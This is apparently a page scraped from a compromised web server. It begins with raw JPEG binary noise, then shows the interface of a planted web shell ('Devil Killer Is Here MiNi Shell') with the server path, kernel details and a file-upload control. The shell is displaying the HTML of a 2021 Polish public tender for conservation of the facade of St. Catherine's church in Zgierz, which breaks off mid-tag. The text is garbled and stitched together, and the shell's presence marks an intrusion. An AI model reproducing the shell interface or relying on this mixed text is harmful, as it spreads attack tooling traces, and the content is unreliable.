JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210726/0012620401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00126204 z dnia 2021-07-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie prac remontowo-konserwatorskich elewacji Kościoła Farnego pw. Świętej Katarzyny Aleksandryjskiej w Zgierzu – etap III – prace ratunkowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Parafia Rzymskokatolicka pw. św. Katarzyny Aleksandryjskiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 040026451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Jana Pawła II 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swietakatarzyna@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www3.archidiecezja.lodz.pl/~swkatarzyna/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Parafia rzymskokatolicka </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Miasto Zgierz</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">472057721</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">pl. Jana Pawła II 16</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@umz.zgierz.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">bip.zgierz.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie prac remontowo-konserwatorskich elewacji Kościoła Farnego pw. Świętej Katarzyny Aleksandryjskiej w Zgierzu – etap III – prace ratunkowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df5f7857-eba1-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00126204</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/umz.zgierz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne opisane zostały w dokumencie "Instrukcja dla wykonawców platformazakupowa.pl" oraz w „Regulaminie platformazakupowa.pl”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1) administratorem Pani/Pana danych osobowych jest:<br/> - Prezydent Miasta Zgierza, z siedzibą w Zgierzu, plac Jana Pawła II 16, 95-100 Zgierz<br/> - Parafia Rzymskokatolicka pw. św. Katarzyny Aleksandryjskiej, <br/> pl. Jana Pawła II 11/13, 95-100 Zgierz<br/>2) w sprawie ochrony swoich danych osobowych proszę skontaktować się z INSPEKTOREM<br/> OCHRONY DANYCH OSOBOWYCH pod adresem e-mail: e-urzad@umz.zgierz.pl<br/>lub epuap.gov.pl skrytka epuap:/4ebn4d0m4f/skrytka; lub pisemnie na adres Urzędu Miasta<br/>Zgierza: plac Jana Pawła II 16, 95-100 Zgierz;<br/>w sprawie ochrony swoich danych osobowych proszę skontaktować się z księdzem proboszczem<br/> Andrzejem Chmielewskim, kontakt: swietakatarzyna@gmail.com, tel: (42) 716 33 18<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm), dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres <br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych 2;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 3;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PRzK.2.PN.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie prac remontowo-konserwatorskich elewacji Kościoła Farnego pw. Świętej Katarzyny Aleksandryjskiej w Zgierzu – etap III – prace ratunkowe: prace remontowo-konserwatorskie<br/>elewacji południowej i części zachodniej prezbiterium i kaplicy oraz części zachodniej<br/>południowego skrzydła transeptu.Zamówienie obejmuje wykonanie prac remontowokonserwatorskich<br/>elewacji południowej i części zachodniej prezbiterium i kaplicy oraz części<br/>zachodniej południowego skrzydła transeptu Kościoła Farnego pw. Świętej Katarzyny<br/>Aleksandryjskiej w Zgierzu. Prace będą prowadzone na ścianach prezbiterium, kaplicy i<br/>transeptu w zakreskowanej część elewacji zgodnie z Załącznikiem Nr 7 – Rysunek zakres prac.<br/>Powierzchnia elewacji objęta pracami – 403,77 m2. Wszystkie prace należy wykonać zgodnie z<br/>projektem budowlanym (zał. Nr 2a i nr 2b) stanowiącym załącznik do decyzji pozwolenia na<br/>budowę nr 245/2018 z dnia 01.03.2018 r. (zał. nr 1), specyfikacją techniczną wykonania i<br/>odbioru robót budowlanych (zał. nr 5), oraz zgodnie z przedstawionym poniżej szczegółowym<br/>zakresem rzeczowym zamówienia i aktualnie obowiązującymi przepisami. Przedmiar robót,<br/>stanowiący zał. nr 4, należy traktować jako materiał pomocniczy, niebędący podstawą opisu<br/>przedmiotu zamówienia i obliczenia ceny ryczałtowej oferty.Przed złożeniem oferty na<br/>wykonanie przedmiotu zamówienia zalecana jest wizja lokalna istniejącego stanu elewacji<br/>Kościoła Farnego pw. Świętej Katarzyny Aleksandryjskiej w Zgierzu.Szczegółowy zakres<br/>zamówienia obejmuje: - ustawienie rusztowań i pomostów roboczych, zabezpieczenie terenu<br/>robót,- oczyszczenie powierzchni elewacji,- ostrożne mechaniczne i ręczne usunięcie<br/>cementowych fug w spoinach warstwy licowej,- ostrożne mechaniczne i ręczne usunięcie<br/>wtórnych materiałów naprawczych (wtórne spoinowanie, zaprawki i wypełnienia cementowe<br/>itp.),- odgrzybianie i dezynfekcja powierzchni murów,- miejscowe odsalanie muru,- wzmacnianie<br/>strukturalne cegieł,- przemurowanie i rekonstrukcja fragmentów muru,- uzupełnienie ubytków w<br/>cegłach,- naprawa pęknięć muru,- mocowanie odspojonych fragmentów warstwy licowej,-<br/>wykonanie spoinowania murów,- restauracja tynków na portalach nad wejściami do naw<br/>bocznych,- hydrofobizacja poziomych i ukośnych płaszczyzn murów,- wywóz i utylizacja<br/>materiałów z rozbiórki,- rozebranie rusztowań i pomostów roboczych, uporządkowanie terenu<br/>robót. UWAGA: Zamawiający wymaga w zakresie realizacji zamówienia zatrudnienia przez<br/>Wykonawcę i Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane niżej<br/>czynności: - murowanie lub renowacja murów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45262110-5 - Demontaż rusztowań</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45262521-9 - Roboty murarskie w zakresie fasad</p> <p class="mb-0">45262690-4 - Remont starych budynków</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45452000-0 - Zewnętrzne czyszczenie budynków</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień polegających na powtórzeniu podobnych <br/>usług lub robót budowlanych, o których mowa w art. 214 ust. 1 pkt 7 prawa zamówień publicznych w <br/>zakresie wartości do 2.000.000,00 zł, na warunkach – odpowiednio: - przez Wykonawcę<br/>niepodlegającego wykluczeniu; - przez Wykonawcę spełniającego, odpowiednio i proporcjonalnie do <br/>charakteru i rozmiaru zamówienia, warunki udziału w postępowaniu; - z zachowaniem, odpowiednio i <br/>proporcjonalnie do charakteru i rozmiaru zamówienia, warunków umowy, jak w postępowaniu o <br/>udzielenie zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający <br/>stosować będzie następujące kryteria oceny ofert: cena, okres gwarancji (całkowity, ale nie dłuższy niż <br/>10 lat), wysokość kar umownych, zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (całkowity, ale nie dłuższy niż 10 lat)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kar umownych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dotyczący zdolności do występowania w obrocie <br/>gospodarczym, wg art. 113 PZP: Wykonawca prowadząc działalność gospodarczą lub <br/>zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w <br/>kraju, w którym ma siedzibę lub miejsce zamieszkania.Warunek udziału w postępowaniu <br/>dotyczący zdolności technicznej lub zawodowej, wg art. 116 PZP: Wykonawca wykonał <br/>(zakończył wykonanie) nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu <br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej <br/>1 robotę budowlaną o wartości minimum 100.000,00 zł, odpowiadającą swoim rodzajem robotom <br/>budowlanym stanowiącym przedmiot zamówienia („związaną z przedmiotem zamówienia” ), tj. <br/>roboty budowlano - konserwatorskie w obiekcie wpisanym do rejestru zabytków, potwierdzone <br/>dowodami określającymi, że te roboty zostały wykonane należycie. Wykonawca dysponuje <br/>osobami, skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości lub kierowanie robotami <br/>budowlanymi, tj.: - co najmniej 1 osobą - konserwatorem dzieł sztuki w zakresie restauracji <br/>elementów i detali architektonicznych; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 <br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej <br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów <br/>(Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową <br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, <br/>oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/>Wykonawcy należącego do tej samej grupy kapitałowej;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument potwierdzający, że Wykonawca jest wpisany do jednego z <br/>rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce <br/>zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem; wykaz robót <br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca <br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów <br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których <br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/>budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie <br/>uzyskać tych dokumentów – inne odpowiednie dokumenty, dotyczy robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia <br/>(„związanych z przedmiotem zamówienia”), tj.: roboty budowlano - konserwatorskie w obiekcie <br/>wpisanym do rejestru zabytków; wykaz osób, skierowanych przez Wykonawcę do realizacji <br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, <br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a <br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> PEŁNOMOCNICTWO do reprezentowania w postępowaniu o udzielenie zamówienia – <br/>w szczególności – do podpisania oferty wraz z załącznikami – o ile nie wynika ono z innych <br/>dokumentów załączonych przez Wykonawcę. ZOBOWIĄZANIE podmiotu udostępniającego <br/>zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego <br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując <br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeśli Wykonawca <br/>polega na tych zasobach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span 